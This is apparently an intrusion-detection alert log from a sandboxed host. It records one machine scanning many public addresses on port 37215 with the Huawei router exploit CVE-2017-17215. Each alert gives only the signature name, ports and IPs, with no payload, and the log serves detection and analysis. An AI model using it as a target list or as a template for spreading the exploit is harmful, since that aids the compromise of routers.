                                            06/14/24-10:44:22.881299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4599037215192.168.2.14156.103.181.58
                                            06/14/24-10:44:29.022573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3512837215192.168.2.1441.133.44.143
                                            06/14/24-10:43:39.792818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5885837215192.168.2.1441.68.190.70
                                            06/14/24-10:43:43.971137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5456437215192.168.2.14197.225.214.148
                                            06/14/24-10:44:06.452430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3832237215192.168.2.14197.105.246.196
                                            06/14/24-10:44:18.779257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4258837215192.168.2.1441.89.178.231
                                            06/14/24-10:44:06.471575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5197037215192.168.2.14156.129.218.11
                                            06/14/24-10:44:33.131736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5597637215192.168.2.1441.217.177.191
                                            06/14/24-10:43:34.661950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4627437215192.168.2.14197.143.65.56
                                            06/14/24-10:43:52.164732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5150637215192.168.2.1441.22.69.134
                                            06/14/24-10:43:39.809995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4386837215192.168.2.1441.16.93.68
                                            06/14/24-10:43:45.966779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6040837215192.168.2.14197.145.170.70
                                            06/14/24-10:44:02.385605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5923237215192.168.2.14156.227.136.110
                                            06/14/24-10:44:06.451113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4986437215192.168.2.1441.0.179.232
                                            06/14/24-10:44:02.369186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3326237215192.168.2.14156.5.190.254
                                            06/14/24-10:43:52.160780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3844837215192.168.2.14197.1.190.70
                                            06/14/24-10:44:24.916915TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5746237215192.168.2.1441.159.180.18
                                            06/14/24-10:44:02.384563TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3947237215192.168.2.14156.114.220.3
                                            06/14/24-10:44:12.616253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4225237215192.168.2.14197.244.170.93
                                            06/14/24-10:43:43.971413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4488837215192.168.2.1441.198.15.59
                                            06/14/24-10:44:12.615991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5382837215192.168.2.14156.49.37.166
                                            06/14/24-10:43:39.812260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3430437215192.168.2.1441.53.143.0
                                            06/14/24-10:43:56.230191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3834037215192.168.2.14197.236.209.207
                                            06/14/24-10:43:56.246207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5099837215192.168.2.1441.59.40.45
                                            06/14/24-10:43:56.246021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3975837215192.168.2.14156.215.244.40
                                            06/14/24-10:44:04.421692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5425037215192.168.2.14156.195.80.217
                                            06/14/24-10:44:20.804913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5197437215192.168.2.1441.150.34.225
                                            06/14/24-10:43:45.984617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4219637215192.168.2.14156.191.196.193
                                            06/14/24-10:43:45.967973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4935637215192.168.2.1441.154.132.177
                                            06/14/24-10:43:54.201565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3513437215192.168.2.14197.160.20.147
                                            06/14/24-10:44:18.776069TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5962437215192.168.2.1441.250.193.88
                                            06/14/24-10:44:02.367026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5504237215192.168.2.1441.204.119.150
                                            06/14/24-10:43:43.968956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5246437215192.168.2.14197.214.42.67
                                            06/14/24-10:44:00.326358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4707837215192.168.2.1441.26.114.102
                                            06/14/24-10:43:36.704378TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5278237215192.168.2.1441.153.60.230
                                            06/14/24-10:44:02.381776TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5039237215192.168.2.14156.161.106.61
                                            06/14/24-10:43:36.705589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4445037215192.168.2.1441.90.65.244
                                            06/14/24-10:44:06.451741TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3906437215192.168.2.1441.101.141.132
                                            06/14/24-10:43:58.275811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4182037215192.168.2.14156.139.2.199
                                            06/14/24-10:44:18.779772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5372837215192.168.2.14156.139.109.139
                                            06/14/24-10:44:18.765183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5081637215192.168.2.14197.166.32.48
                                            06/14/24-10:44:04.425151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5040037215192.168.2.14156.219.73.55
                                            06/14/24-10:44:08.519013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4172637215192.168.2.1441.213.147.241
                                            06/14/24-10:43:58.274929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5817837215192.168.2.14156.131.129.202
                                            06/14/24-10:43:48.019972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4163437215192.168.2.14197.54.200.89
                                            06/14/24-10:43:48.034319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5404237215192.168.2.1441.147.17.251
                                            06/14/24-10:43:36.722379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4588837215192.168.2.14156.128.84.72
                                            06/14/24-10:43:54.184836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4715637215192.168.2.1441.142.174.173
                                            06/14/24-10:44:24.942098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4431037215192.168.2.14156.203.128.109
                                            06/14/24-10:44:00.320005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5424237215192.168.2.1441.255.214.9
                                            06/14/24-10:44:16.735368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4593037215192.168.2.14156.113.178.127
                                            06/14/24-10:43:54.199917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4546237215192.168.2.14156.16.145.171
                                            06/14/24-10:43:43.971536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5980437215192.168.2.14156.246.216.255
                                            06/14/24-10:44:29.025697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6042437215192.168.2.14156.1.186.227
                                            06/14/24-10:43:43.943811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6049237215192.168.2.14197.209.252.37
                                            06/14/24-10:43:34.675424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5897437215192.168.2.14197.228.135.200
                                            06/14/24-10:43:58.295150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4959237215192.168.2.14197.119.32.8
                                            06/14/24-10:43:54.202028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5855637215192.168.2.1441.70.80.34
                                            06/14/24-10:43:39.810053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4367037215192.168.2.14197.172.35.102
                                            06/14/24-10:44:06.472779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4375837215192.168.2.14156.46.102.55
                                            06/14/24-10:44:20.803535TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6073237215192.168.2.14156.253.43.104
                                            06/14/24-10:44:12.616089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3978637215192.168.2.14197.184.3.62
                                            06/14/24-10:44:24.917918TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5591037215192.168.2.14197.126.146.123
                                            06/14/24-10:43:39.792307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5681037215192.168.2.14156.115.247.76
                                            06/14/24-10:44:06.470607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5083837215192.168.2.14156.89.104.78
                                            06/14/24-10:44:04.425132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5199237215192.168.2.14197.8.69.209
                                            06/14/24-10:44:12.614591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3445437215192.168.2.14156.10.186.96
                                            06/14/24-10:44:20.828751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4851437215192.168.2.14197.14.251.237
                                            06/14/24-10:43:58.290633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5890637215192.168.2.14156.152.149.184
                                            06/14/24-10:43:39.793123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4751037215192.168.2.14197.254.162.167
                                            06/14/24-10:44:31.056143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4867437215192.168.2.14156.21.48.38
                                            06/14/24-10:43:56.246061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5136037215192.168.2.14156.140.254.183
                                            06/14/24-10:44:24.913620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5967637215192.168.2.14156.150.229.29
                                            06/14/24-10:43:45.968999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5405037215192.168.2.14197.31.192.15
                                            06/14/24-10:43:39.789594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4114037215192.168.2.14156.249.180.127
                                            06/14/24-10:43:36.727567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4940237215192.168.2.14197.244.153.193
                                            06/14/24-10:44:04.409526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3810437215192.168.2.14156.171.153.113
                                            06/14/24-10:44:08.502566TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4634037215192.168.2.14197.45.81.126
                                            06/14/24-10:43:52.143054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5778837215192.168.2.1441.3.101.83
                                            06/14/24-10:44:04.412158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3451037215192.168.2.1441.205.248.204
                                            06/14/24-10:44:18.762409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3739037215192.168.2.14156.133.96.153
                                            06/14/24-10:44:16.716875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4057237215192.168.2.14197.115.173.204
                                            06/14/24-10:44:35.177242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5256637215192.168.2.14156.69.120.178
                                            06/14/24-10:43:39.788829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4154437215192.168.2.14156.152.239.250
                                            06/14/24-10:44:18.763106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4752637215192.168.2.14197.35.186.94
                                            06/14/24-10:43:37.761638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5205237215192.168.2.14197.81.163.144
                                            06/14/24-10:44:24.917975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6059637215192.168.2.1441.75.140.45
                                            06/14/24-10:43:52.145730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4996237215192.168.2.14197.67.108.73
                                            06/14/24-10:43:39.813131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3829437215192.168.2.14197.45.159.107
                                            06/14/24-10:43:48.031245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4442437215192.168.2.1441.205.210.186
                                            06/14/24-10:43:48.017586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4996837215192.168.2.14156.203.55.200
                                            06/14/24-10:43:48.034375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4813237215192.168.2.14156.198.72.98
                                            06/14/24-10:44:00.342296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4761637215192.168.2.1441.105.109.197
                                            06/14/24-10:44:24.916319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5053237215192.168.2.14197.51.24.23
                                            06/14/24-10:44:08.502801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3932037215192.168.2.14156.195.37.247
                                            06/14/24-10:43:58.292019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3970237215192.168.2.14156.162.235.239
                                            06/14/24-10:43:41.898449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5787837215192.168.2.1441.66.9.35
                                            06/14/24-10:44:10.546409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3847437215192.168.2.14197.75.132.38
                                            06/14/24-10:43:56.244960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6079837215192.168.2.1441.165.73.216
                                            06/14/24-10:44:24.932538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5800237215192.168.2.1441.255.138.187
                                            06/14/24-10:44:04.412181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3430437215192.168.2.14197.204.204.195
                                            06/14/24-10:43:43.941474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5850237215192.168.2.14197.199.149.9
                                            06/14/24-10:44:02.367859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5550437215192.168.2.14197.224.22.162
                                            06/14/24-10:44:26.999543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4645637215192.168.2.14197.5.16.28
                                            06/14/24-10:44:33.134472TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5905237215192.168.2.14197.116.224.36
                                            06/14/24-10:43:48.033228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5828237215192.168.2.14197.209.169.188
                                            06/14/24-10:43:48.022088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3595237215192.168.2.14156.19.226.215
                                            06/14/24-10:44:14.669129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3954237215192.168.2.14156.152.69.116
                                            06/14/24-10:43:45.984505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3468637215192.168.2.1441.238.133.200
                                            06/14/24-10:43:50.074789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3933437215192.168.2.14197.74.203.95
                                            06/14/24-10:43:52.146419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5160837215192.168.2.14156.142.78.58
                                            06/14/24-10:44:04.421079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5021437215192.168.2.14156.159.180.35
                                            06/14/24-10:43:43.944413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5792837215192.168.2.1441.188.237.90
                                            06/14/24-10:43:43.970776TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4348837215192.168.2.14197.139.184.183
                                            06/14/24-10:43:39.809402TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5737237215192.168.2.1441.194.8.16
                                            06/14/24-10:43:50.074374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5830837215192.168.2.1441.203.69.123
                                            06/14/24-10:44:33.131918TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5251637215192.168.2.1441.179.42.125
                                            06/14/24-10:44:33.133291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6064637215192.168.2.1441.204.130.95
                                            06/14/24-10:44:29.022140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3809237215192.168.2.14197.67.51.57
                                            06/14/24-10:44:16.716667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5060637215192.168.2.1441.218.34.51
                                            06/14/24-10:43:34.662112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4791037215192.168.2.1441.181.77.39
                                            06/14/24-10:44:31.056095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5235637215192.168.2.14197.43.51.200
                                            06/14/24-10:44:02.368441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4414237215192.168.2.14197.58.124.154
                                            06/14/24-10:44:26.979535TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6077037215192.168.2.14156.16.141.226
                                            06/14/24-10:43:39.788987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4290437215192.168.2.14156.103.173.68
                                            06/14/24-10:44:31.051268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4999637215192.168.2.14197.129.163.60
                                            06/14/24-10:43:39.788788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4895437215192.168.2.14197.62.123.93
                                            06/14/24-10:44:12.625125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5900437215192.168.2.1441.226.224.51
                                            06/14/24-10:44:12.614141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4065837215192.168.2.1441.15.68.19
                                            06/14/24-10:44:00.340827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4287037215192.168.2.1441.245.136.153
                                            06/14/24-10:44:14.673080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3773237215192.168.2.14156.211.89.102
                                            06/14/24-10:43:56.243888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4017437215192.168.2.14197.188.18.128
                                            06/14/24-10:44:10.544052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4568437215192.168.2.1441.192.172.174
                                            06/14/24-10:44:18.779963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4854637215192.168.2.14156.48.55.218
                                            06/14/24-10:44:31.094696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5674237215192.168.2.14197.153.236.215
                                            06/14/24-10:44:00.337076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5941637215192.168.2.14156.58.33.183
                                            06/14/24-10:43:56.228566TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3797037215192.168.2.14197.236.90.134
                                            06/14/24-10:43:45.992494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5994837215192.168.2.14156.192.0.152
                                            06/14/24-10:43:52.148184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4087037215192.168.2.14197.132.78.207
                                            06/14/24-10:44:22.858423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4059637215192.168.2.1441.86.208.249
                                            06/14/24-10:43:56.224673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3359037215192.168.2.1441.74.18.20
                                            06/14/24-10:43:58.293020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3740037215192.168.2.1441.24.49.33
                                            06/14/24-10:44:04.421725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5073037215192.168.2.1441.181.65.31
                                            06/14/24-10:43:43.941027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4695037215192.168.2.14156.53.163.238
                                            06/14/24-10:44:10.563956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131237215192.168.2.14156.238.222.180
                                            06/14/24-10:44:10.547319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5064437215192.168.2.1441.114.2.222
                                            06/14/24-10:44:00.336046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4159237215192.168.2.14197.20.182.72
                                            06/14/24-10:44:33.133822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4467037215192.168.2.14197.210.251.33
                                            06/14/24-10:44:02.368318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3900237215192.168.2.14156.124.184.193
                                            06/14/24-10:44:06.450824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5291437215192.168.2.14156.45.25.188
                                            06/14/24-10:43:39.812367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6009037215192.168.2.14197.199.147.250
                                            06/14/24-10:44:08.503100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5687837215192.168.2.14156.30.76.223
                                            06/14/24-10:44:29.023878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6066437215192.168.2.14197.110.106.160
                                            06/14/24-10:43:48.034677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4451637215192.168.2.14197.117.43.101
                                            06/14/24-10:43:45.984540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4664637215192.168.2.14156.32.151.135
                                            06/14/24-10:43:54.183671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4667237215192.168.2.14197.25.62.53
                                            06/14/24-10:44:06.452516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5421637215192.168.2.14156.23.166.36
                                            06/14/24-10:43:39.791733TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5091637215192.168.2.1441.46.168.23
                                            06/14/24-10:44:22.883013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5410437215192.168.2.14156.227.5.5
                                            06/14/24-10:44:29.014485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5999837215192.168.2.14156.115.204.6
                                            06/14/24-10:44:10.548523TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3877237215192.168.2.14197.130.25.248
                                            06/14/24-10:43:37.760565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3715637215192.168.2.1441.161.95.168
                                            06/14/24-10:43:58.294188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5650237215192.168.2.14197.108.195.198
                                            06/14/24-10:44:22.859551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3284037215192.168.2.14156.30.49.245
                                            06/14/24-10:43:48.019223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4499637215192.168.2.14197.217.132.207
                                            06/14/24-10:44:18.760932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4545037215192.168.2.1441.226.155.82
                                            06/14/24-10:44:29.023985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3380037215192.168.2.14156.145.60.223
                                            06/14/24-10:43:34.662590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5357237215192.168.2.14156.251.163.18
                                            06/14/24-10:43:41.846984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3723037215192.168.2.1441.249.153.240
                                            06/14/24-10:43:50.075270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4852637215192.168.2.1441.7.32.107
                                            06/14/24-10:44:33.132271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3411237215192.168.2.14197.63.126.50
                                            06/14/24-10:44:00.323589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4376037215192.168.2.1441.201.89.127
                                            06/14/24-10:44:04.410149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5402237215192.168.2.1441.233.82.126
                                            06/14/24-10:44:18.766958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4886237215192.168.2.1441.102.31.57
                                            06/14/24-10:43:50.111492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5374637215192.168.2.14197.255.191.33
                                            06/14/24-10:44:10.549294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5550037215192.168.2.14156.120.161.148
                                            06/14/24-10:44:20.807392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5297237215192.168.2.14156.196.160.52
                                            06/14/24-10:44:16.733666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4285837215192.168.2.1441.126.88.224
                                            06/14/24-10:44:26.977251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5640237215192.168.2.14197.81.170.83
                                            06/14/24-10:43:41.850390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3449437215192.168.2.14197.52.64.141
                                            06/14/24-10:43:39.789508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4336237215192.168.2.14197.42.25.51
                                            06/14/24-10:44:33.134331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3477837215192.168.2.1441.193.108.32
                                            06/14/24-10:43:34.678262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4304237215192.168.2.14156.41.216.245
                                            06/14/24-10:43:37.761745TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4049237215192.168.2.14197.205.120.123
                                            06/14/24-10:44:00.321301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5046037215192.168.2.14197.212.73.75
                                            06/14/24-10:44:22.860151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4079037215192.168.2.14197.223.182.183
                                            06/14/24-10:43:37.762525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3697237215192.168.2.14156.68.246.42
                                            06/14/24-10:43:43.969482TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5423837215192.168.2.14156.4.161.169
